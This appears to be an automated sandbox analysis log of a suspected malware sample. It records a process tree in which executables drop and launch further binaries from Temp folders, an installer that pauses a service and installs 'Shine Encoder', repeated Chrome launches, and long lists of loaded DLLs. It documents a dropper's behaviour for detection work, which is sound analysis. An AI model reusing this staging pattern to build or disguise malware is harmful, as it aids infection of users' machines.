Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsGDHIDHIEGI.exe "C:\Users\user\DocumentsGDHIDHIEGI.exe"	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe "C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Process created: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp" /SL5="$40464,5532893,721408,C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause shine-encoder_11152
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe "C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause shine-encoder_11152
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,14623625801092511307,12696391534601995446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1180,i,9199522275752105245,15010947955167671813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2008,i,10237018931466361704,17092853076335079312,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: coreuicomponents.dll
